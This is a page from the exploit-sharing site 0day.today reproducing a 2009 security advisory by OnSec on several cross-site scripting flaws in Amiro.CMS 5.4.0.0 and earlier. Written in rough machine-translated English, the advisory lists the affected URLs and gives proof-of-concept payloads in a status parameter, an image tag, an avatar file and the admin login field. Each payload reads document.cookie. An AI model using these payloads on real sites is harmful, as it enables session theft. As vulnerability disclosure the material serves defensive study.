0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Amiro.CMS <= 5.4.0.0 xss
[======================== Amiro.CMS <= 5.4.0.0 xss ======================== ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [ONSEC-09-004] Amiro.CMS Multiple XSS Objective: Amiro <= 5.4.0.0 Type: Cross-site scripting Threat: Medium Date Discovered: 01.07.2009 Date of notification Developer: 01.07.2009 Released fixes: 06.10.2009 Author: Vladimir Vorontsov OnSec Russian Security Group Description: ================================================ ==== The vulnerability exists due to defect in the function test special characters in the string parameter status_msg. Especially the query with the tag [ALERT] [/ ALERT] allows you to make any sacrifices in the browser JavaScript code. Parameter status_msg serves to notify the user and processed at: ================================================== == http://localhost:7777/news http://localhost:7777/comment http://localhost:7777/forum http://localhost:7777/blog http://localhost:7777/tags http://localhost:7777/_admin/forum.php http://localhost:7777/_admin/discussion.php http://localhost:7777/_admin/guestbook.php http://localhost:7777/_admin/blog.php http://localhost:7777/_admin/news.php http://localhost:7777/_admin/srv_updates.php http://localhost:7777/_admin/srv_backups.php http://localhost:7777/_admin/srv_twist_prevention.php http://localhost:7777/_admin/srv_tags.php http://localhost:7777/_admin/srv_tags_reindex.php http://localhost:7777/_admin/google_sitemap.php http://localhost:7777/_admin/sitemap_history.php http://localhost:7777/_admin/srv_options.php http://localhost:7777/_admin/locales.php http://localhost:7777/_admin/plugins_wizard.php Special types of string parameter is as follows (the submission URL-decoded): ? status_msg = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a: 2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert (document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}} Implementation: http://localhost:7777/news/?status_msg=a% 3A2% 3A% 7Bs% 3A3% 3A% 22sys% 22% 3Ba% 3A0% 3A% 7B% 7Ds% 3A5% 3A% 22plain% 22% 3Ba% 3A1 % 3A% 7Bi% 3A0% 3Ba% 3A2% 3A% 7Bs% 3A3% 3A% 22msg% 22% 3Bs% 3A68% 3A% 22ONsec.ru% 20 -% 20XSS% 20test% 5BALERT% 5D% 5C% 27% 29% 3Balert% 28document.cookie% 29% 2F% 2Falert% 28% 5B% 2FALERT% 5D% 22% 3Bs% 3A4% 3A% 22type% 22% 3Bs% 3A4% 3A% 22none% 22% 3B% 7D% 7D% 7D ================================================== ==== Vulnerability exists in the processing function values of the tag [IMG], which serves to place the pictures in the message body. By sending a special message on the forum, guestbook or leave a comment, an attacker can execute arbitrary JavaScript code on the victim's computer, which will see his message. The result of the example depends on the browser, checked on Opera 9.52 build 10108. ================================================== ==== Implementation: [IMG] javascript: alert (document.cookie +% 27 \ n \ nONsec.ru% 27) [/ IMG] ================================================== ==== The vulnerability exists due to the lack of checks on user avatars. An attacker could upload an avatar with JavaScript code inside the file with the extension. PNG,. JPG or other image. When you open a full reference to this picture browser Internet Explorer <= 7, on a computer to execute contained within JavaScript code. ================================================== ==== Implementation: Create a file with the following contents: <script> alert (document.cookie + "\ n \ nONsec.ru") </ script> save it as avatar.png, then upload as your avatar. Open the link to the downloaded file browser InternetExplorer <= 7. ================================================== ==== The vulnerability exists due to the lack of filtering of characters in the user name when logging into the administrative console. When sending a POST request to a page http://localhost:7777/pages.php similar content: ================================================== ==== username = "> <script> alert (document.cookie +" \ n \ nONsec.Ru ") </ script> application returns the following response: <input class=field style="width:100px" type=text name="loginname" value=""> <script> alert (document.cookie + "\ n \ nONsec.Ru") </ script> "> Implementation: In the administrative console login prompt, enter the user name: "> <script> alert (document.cookie +" \ n \ nONsec.Ru ") </ script> and will realize the login attempt # 0day.today [2024-11-16] #